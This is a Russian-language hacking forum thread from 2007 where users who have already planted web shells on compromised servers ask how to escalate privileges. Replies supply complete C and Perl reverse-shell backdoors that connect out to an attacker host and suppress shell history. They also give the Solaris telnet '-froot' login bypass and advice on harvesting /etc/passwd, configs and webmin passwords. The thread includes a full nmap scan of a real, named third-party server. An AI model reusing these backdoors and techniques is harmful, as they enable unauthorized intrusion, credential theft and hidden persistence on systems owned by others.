Поднятие прав. Вопросы по использованию различных скриптов (любых, КРОМЕ ЭКСПЛОИТОВ!)

Discussion in 'Linux, Freebsd, *nix' started by Obormot, 12 Feb 2007.

  1. Obormot

    Obormot New Member

    Joined:
    8 Feb 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Added by L0rd_Ha0S: Вопросы по поднятию прав, по использованию разного рода скриптов, вроде web-шеллов, биндшеллов, бэкконект, и т.п. - задавать сюда! НЕ РАЗРЕШАЕТСЯ - вопросы о сплойтах, для этого есть специальные темы!

    В общем думаю не один сталкивался с такой ситуацией.. Взломали мы какую-нибудь CMS (не важно что)
    И залили наш шел... НО прав на редиктирование ГРУБО говоря index.php нет(
    Мой вопролс водится к тому, какие методы существую для поднятия прав на удаленом сервере. На самом деле тупой дефейс мне не нужен, просто хочу понять смысл..
    Дак вот, мной был залит бек дур на серв (.pl) нет катом получул входящее соединение. В общем как мне поступать дальше ) Сервер управляется 5.4-RELEASE FreeBSD.
     
    #1 Obormot, 12 Feb 2007
    Last edited by a moderator: 10 Dec 2007
  2. andy13

    andy13 Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    100
    Likes Received:
    15
    Reputations:
    3
  3. hsi

    hsi Member

    Joined:
    11 Sep 2006
    Messages:
    214
    Likes Received:
    61
    Reputations:
    7
    Obormot
    Во-первых нужно узнать, стоит ли на apache noexec. Если стоит, то ты никакой бинарник из под nobody запустить не сможешь. Если не стоит и система не патченная, то можно попробовать сплойт для этой ветки.
    Почитай mysql-конфиги, возможно пасс оттуда подойдет на фтп.
    Прочитай /etc/passwd, отсей аккаунты, имеющие шелл и попробуй их видом login=pass на фтп.
    Ищи уязвимые демоны в системе (старые mysql, ftp, etc), уязвимости в которых позволяют повысить локальные привелегии.
    В общем, способов существует масса, нужно только проявить фантазию.
     
    1 person likes this.
  4. Bac9l

    Bac9l New Member

    Joined:
    25 Feb 2007
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    Здравствуйте.
    У меня вопрос примерно такой же. Залил р57 на серв, бэк коннект чет не контачит (вероятно кривые руки, неткатом слушаю порт, задаю в р57 ип, тыркаю кнопку и он виснет) может ли этому серв припятствовать? Есть ли другиt способы поднять права, или стащить /etc/shadow? Уж очень серв понравился)
     
  5. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    Пробуй биндить как перловыми скриптами так и сишным.
     
  6. hsi

    hsi Member

    Joined:
    11 Sep 2006
    Messages:
    214
    Likes Received:
    61
    Reputations:
    7
    Если твой комп в локальной сети, то есть ты выходишь через шлюз, то backconnect не получится. Вполне возможно, что на сервере правильно настроенный фаерволл, который блокирует любой неразрешенный явно траффик.
    Попробуй запустить backconnect вручную с помощью этих скриптов.
    Backconnect на С:
    Code:
    /*
    oooo...oooo.oooooooo8.ooooooooooo
    .8888o..88.888........88..888..88
    .88.888o88..888oooooo.....888....
    .88...8888.........888....888....
    o88o....88.o88oooo888....o888o...
    *********************************
    **** Network security team ******
    ********* nst.void.ru ***********
    *********************************
    * Title: nsT BackConnect Backdoor v1.0
    * Date: 09.04.2006
    * Usage:
    *	client:	nc -lp 9999
    *	server: ./backconnect <ip_client> 9999
    *********************************
    */
    
    #include <stdlib.h>
    #include <stdio.h>
    #include <error.h>
    #include <string.h>
    #include <fcntl.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <resolv.h>
    
    int main (int argc, char **argv) {
        struct sockaddr_in sock;
        int sd;
        char command[256];
        
        if (argc < 3) {
    	printf("%s <host> <port>\n", argv[0]);
    	return 1;
        }
        
        close(1);
        
        if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
    	perror(argv[0]);
    	return 1;
        }
        
        bzero(&sock, sizeof(sock));
        
        sock.sin_family = AF_INET;
        sock.sin_port = htons(atoi(argv[2]));
        inet_aton(argv[1], &sock.sin_addr);
        
        if (connect(sd, (struct sockaddr *)&sock, sizeof(sock))) {
    	perror(argv[0]);
    	return 1;
        }
        
        close(2);
        dup(sd);
        
        bzero(command, 256);
        while (recv(sd, command, 255, 0) && strncmp(command, "quit", 4)) {
    	system(command);
    	bzero(command, 256);
        }
        
        close(sd);
        return 0;
    }
    
    Backconnect на Perl:
    Code:
    #!/usr/bin/perl
    use IO::Socket;
    #IRAN HACKERS SABOTAGE Connect Back Shell
    #code by:LorD
    #We Are :LorD-C0d3r-NT
    #
    #lord@SlackwareLinux:/home/programing$ perl dc.pl
    #--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
    #
    #Usage: dc.pl [Host] [Port]
    #
    #Ex: dc.pl 127.0.0.1 2121
    #lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
    #--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
    #
    #[*] Resolving HostName
    #[*] Connecting... 127.0.0.1
    #[*] Spawning Shell
    #[*] Connected to remote host
    
    #bash-2.05b# nc -vv -l -p 2121
    #listening on [any] 2121 ...
    #connect to [127.0.0.1] from localhost [127.0.0.1] 2121
    #--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
    #
    #--==Systeminfo==--
    #Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
    #
    #--==Userinfo==--
    #uid=1001(lord) gid=100(users) groups=100(users)
    #
    #--==Directory==--
    #/root
    #
    #--==Shell==--
    #
    $system = '/bin/sh';
    $ARGC=@ARGV;
    print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
    if ($ARGC!=2) {
    print "Usage: $0 [Host] [Port] \n\n";
    die "Ex: $0 127.0.0.1 2121 \n";
    }
    use Socket;
    use FileHandle;
    socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
    connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
    print "[*] Resolving HostName\n";
    print "[*] Connecting... $ARGV[0] \n";
    print "[*] Spawning Shell \n";
    print "[*] Connected to remote host \n";
    SOCKET->autoflush();
    open(STDIN, ">&SOCKET");
    open(STDOUT,">&SOCKET");
    open(STDERR,">&SOCKET");
    print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
    system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
    echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
    system($system);
    #EOF
    
    Если есть какие-то вопросы - не стесняйся задавать.
     
  7. gcc

    gcc Elder - Старейшина

    Joined:
    27 Jan 2007
    Messages:
    88
    Likes Received:
    9
    Reputations:
    0
    Что то, сколько ни пробовал, su -m nobody не дает прав nobody. Значит система пропатчена, или это работает только при настоящем ssh ?
     
  8. 1ten0.0net1

    1ten0.0net1 Time out

    Joined:
    28 Nov 2005
    Messages:
    473
    Likes Received:
    330
    Reputations:
    389
    При наличии терминала/псевдотерминала работает. По поводу поднятия прав - самый лучший вариант, конечно - чтение всяческих хисторей, пассвордов, конфигов. Кроме того, стоит поискать suid-бит на файлах, доступных на запись всем - такое тоже бывает. Ну и конечно суидные бинарники.
     
    1 person likes this.
  9. Bac9l

    Bac9l New Member

    Joined:
    25 Feb 2007
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    hsi
    Именно через шлюз, чет я раньше не подумал(. Пробовал на серве порт открыть, р57 опять виснет и нифига... Буду читать всяческие хистори, пассворы, конфиги)
    Оп просканировал только что порты, там бо2к на 54320-м висит и прокси элитный, часов 5 назад еще ниче не было)))
    Есть ли бо2к под линух?
     
  10. ShadOS

    ShadOS ы

    Joined:
    11 Feb 2007
    Messages:
    667
    Likes Received:
    351
    Reputations:
    413
    Бред... С чего ты взял что там именно bo2k? Это тебе nmap сказал? С какими параметрами ты сканировал? Порт TCP или UDP? Сканер ошибся, просто 54320 - дефолтный порт Back Orifice 2000. Уж сколько лет, а он покоя народу не даёт. Кстати, если даже сканер не ошибся (точнее он всё равно ошибся), то это, вероятно, какой-нибдуь простенький honeypot для отлова всяких мег0 хекк3р0в.
    И ещё:
    А прокси теперь значит админы не могут для своих целей поднять?
    И что значит по-твоему элитный? То что он не светит remote addr и useragent? Как ты это определил? Различные чекеры тоже ошибаются =)
     
    #10 ShadOS, 9 Mar 2007
    Last edited: 9 Mar 2007
  11. Bac9l

    Bac9l New Member

    Joined:
    25 Feb 2007
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    Может конечно и бред... Но помойму у тебя инфпрмации слишком мало, чтоб делать такие заключения. Наблюдаю за сервом уже дней 5, раньше портов было открыто в 2 раза меньше.
    Там дыр немерено... Помойму прост ктото вместе со мной там обитает...
    Вот зацените-
    21/tcp open ftp
    22/tcp open ssh
    25/tcp filtered smtp
    42/tcp filtered nameserver
    80/tcp open http
    81/tcp filtered hosts2-ns
    111/tcp filtered rpcbind
    135/tcp filtered msrpc
    137/tcp filtered netbios-ns
    139/tcp filtered netbios-ssn
    389/tcp filtered ldap
    445/tcp filtered microsoft-ds
    513/tcp open login
    514/tcp open shell
    636/tcp filtered ldapssl
    1001/tcp filtered unknown
    1022/tcp filtered unknown
    1023/tcp filtered netvenuechat
    1025/tcp filtered NFS-or-IIS
    1080/tcp open socks
    1433/tcp filtered ms-sql-s
    2049/tcp filtered nfs
    2766/tcp filtered listen
    3128/tcp filtered squid-http
    3268/tcp filtered globalcatLDAP
    3269/tcp filtered globalcatLDAPssl
    4045/tcp open lockd
    4444/tcp filtered krb524
    5800/tcp filtered vnc-http
    5900/tcp filtered vnc
    6667/tcp open irc
    8080/tcp open elit
    32776/tcp open sometimes-rpc15
    32778/tcp open sometimes-rpc19
    32779/tcp open sometimes-rpc21
    32780/tcp open sometimes-rpc23
    54320/tcp open bo2k
    Еще портов 5 открыто было...
    Почему ты думашь, что сканер ошибся?
     
  12. hsi

    hsi Member

    Joined:
    11 Sep 2006
    Messages:
    214
    Likes Received:
    61
    Reputations:
    7
    Bac9l
    Судя по портам - там windows. А что пишет веб-шелл рст? Если какой-то unix - то вполне возможно, что это honeypot.
     
  13. ShadOS

    ShadOS ы

    Joined:
    11 Feb 2007
    Messages:
    667
    Likes Received:
    351
    Reputations:
    413
    2Bac9l
    попробуй утилиту amap от THC, оредели баннеры сервисов, также отсканируй nmap c опциями -sV -O -vvv и отпишись здесь. Если это FreeBSD-сервер с таким количеством открытых портов, форумной репутацией бьюсь об заклад, что это подсава в виде honeypot.
    LOL =). MS Sql не будет крутиться под FreeBSD, как и bo2k (читай предыдущий мой пост). и т.д.

    Может он обшибся? =)
    2Bac9l как ты это определил?
     
    #13 ShadOS, 10 Mar 2007
    Last edited: 10 Mar 2007
  14. Bac9l

    Bac9l New Member

    Joined:
    25 Feb 2007
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    Про 5.4-RELEASE FreeBSD эт не я говорил... Серв на SunOS 5.10 Generic точно.
    Вот че нмап сказал-


    Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2007-03-10 01:12 MSK
    Initiating SYN Stealth Scan against aux-209-217-33-203.oklahoma.net (209.217.33.203) [1663 ports] at 01:12
    Discovered open port 22/tcp on 209.217.33.203
    Discovered open port 80/tcp on 209.217.33.203
    Discovered open port 21/tcp on 209.217.33.203
    Discovered open port 32780/tcp on 209.217.33.203
    Discovered open port 514/tcp on 209.217.33.203
    Increasing send delay for 209.217.33.203 from 0 to 5 due to 39 out of 128 dropped probes since last increase.
    Discovered open port 32779/tcp on 209.217.33.203
    SYN Stealth Scan Timing: About 29.13% done; ETC: 01:13 (0:01:13 remaining)
    Discovered open port 4045/tcp on 209.217.33.203
    Discovered open port 32778/tcp on 209.217.33.203
    Discovered open port 32776/tcp on 209.217.33.203
    The SYN Stealth Scan took 75.38s to scan 1663 total ports.
    Initiating service scan against 9 services on aux-209-217-33-203.oklahoma.net (209.217.33.203) at 01:13
    The service scan took 5.84s to scan 9 services on 1 host.
    Initiating RPCGrind Scan against aux-209-217-33-203.oklahoma.net (209.217.33.203) at 01:13
    The RPCGrind Scan took 287.47s to scan 5 ports on aux-209-217-33-203.oklahoma.net (209.217.33.203).
    For OSScan assuming port 21 is open, 1 is closed, and neither are firewalled
    Host aux-209-217-33-203.oklahoma.net (209.217.33.203) appears to be up ... good.
    Interesting ports on aux-209-217-33-203.oklahoma.net (209.217.33.203):
    (The 1631 ports scanned but not shown below are in state: closed)
    PORT STATE SERVICE VERSION
    21/tcp open ftp ProFTPD 1.3.0a
    22/tcp open ssh SunSSH 1.1 (protocol 2.0)
    25/tcp filtered smtp
    42/tcp filtered nameserver
    80/tcp open http Apache httpd
    81/tcp filtered hosts2-ns
    111/tcp filtered rpcbind
    135/tcp filtered msrpc
    137/tcp filtered netbios-ns
    139/tcp filtered netbios-ssn
    389/tcp filtered ldap
    445/tcp filtered microsoft-ds
    514/tcp open shell?
    636/tcp filtered ldapssl
    1001/tcp filtered unknown
    1022/tcp filtered unknown
    1023/tcp filtered netvenuechat
    1025/tcp filtered NFS-or-IIS
    1433/tcp filtered ms-sql-s
    2049/tcp filtered nfs
    2766/tcp filtered listen
    3128/tcp filtered squid-http
    3268/tcp filtered globalcatLDAP
    3269/tcp filtered globalcatLDAPssl
    4045/tcp open nlockmgr 1-4 (rpc #100021)
    4444/tcp filtered krb524
    5800/tcp filtered vnc-http
    5900/tcp filtered vnc
    32776/tcp open metad 1-2 (rpc #100229)
    32778/tcp open rpc.unknown
    32779/tcp open rpc.metamedd 1 (rpc #100242)
    32780/tcp open rpc
    Device type: general purpose
    Running: Sun Solaris 9
    OS details: Sun Solaris 9
    OS Fingerprint:
    TSeq(Class=RI%gcd=2%SI=23F27%IPID=I%TS=100HZ)
    T1(Resp=Y%DF=Y%W=C0B7%ACK=S++%Flags=AS%Ops=NNTMNW)
    T2(Resp=N)
    T3(Resp=N)
    T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
    T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
    T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
    T7(Resp=N)
    PU(Resp=Y%DF=Y%TOS=0%IPLEN=70%RIPTL=148%RID=E%RIPCK=E%UCK=F%ULEN=134%DAT=E)

    Uptime 31.955 days (since Tue Feb 6 02:22:45 2007)
    TCP Sequence Prediction: Class=random positive increments
    Difficulty=147239 (Good luck!)
    TCP ISN Seq. Numbers: 9E182FF0 9E26F16A 9E2D6746 9E34CDAE 9E46CB3A 9E4FAE7C
    IPID Sequence Generation: Incremental

    Nmap finished: 1 IP address (1 host up) scanned in 373.539 seconds
    Raw packets sent: 2182 (87.6KB) | Rcvd: 1665 (66.9KB)
    IRC и соксы исчезли) ну и еще че-то
     
    #14 Bac9l, 10 Mar 2007
    Last edited: 10 Mar 2007
  15. hsi

    hsi Member

    Joined:
    11 Sep 2006
    Messages:
    214
    Likes Received:
    61
    Reputations:
    7
    Bac9l
    Ты сказал, у тебя веб-шелл. Покажи вывод команды uname -a
     
  16. Bac9l

    Bac9l New Member

    Joined:
    25 Feb 2007
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    SunOS jupiter 5.10 Generic_118833-33 sun4u sparc SUNW,Ultra-Enterprise.
    Днем там еще телнет открыт был.

    Не подскажешь, где webmin пароли хранит?
     
    #16 Bac9l, 10 Mar 2007
    Last edited: 10 Mar 2007
  17. hsi

    hsi Member

    Joined:
    11 Sep 2006
    Messages:
    214
    Likes Received:
    61
    Reputations:
    7
    Читай конфиг - /etc/webmin/miniserv.conf
    Там указано, какие пароли он использует - из файла /etc/webmin/miniserv.users или /usr/local/etc/webmin/miniserv.users, либо системную авторизацию unix /etc/shadow.
     
  18. Bac9l

    Bac9l New Member

    Joined:
    25 Feb 2007
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    К /etc/webmin/ доступ закрыт, к /var/webmin/ тоже, есть ток /opt/webmin/ а там как я понял только скрипты.
     
  19. hsi

    hsi Member

    Joined:
    11 Sep 2006
    Messages:
    214
    Likes Received:
    61
    Reputations:
    7
    Без рута ты их не прочитаешь.
     
  20. ShadOS

    ShadOS ы

    Joined:
    11 Feb 2007
    Messages:
    667
    Likes Received:
    351
    Reputations:
    413
    Вот и ответ! На солярке недавно багу нашли, позволяющую заходить по telnet любому юзеру не исползуя пароль вот таки макаром:
    telnet -l "-froot" <ip>
    Видимо, пока он был открыт - кто-то влез в неё, админ, обнаружив это, снёс демон in.telnetd и удалил весь срач, который оставил нерадивый хаксор. Хотя это мог и быть червь, который специально создан под данную уязвимость:
    А насчёт вот этого:
    Сорри, недоглядел. Кстати, как видишь, nmap ошибся. Такое часто случается, не стоит полагаться только на сканер - думай головой.
     
    #20 ShadOS, 10 Mar 2007
    Last edited: 10 Mar 2007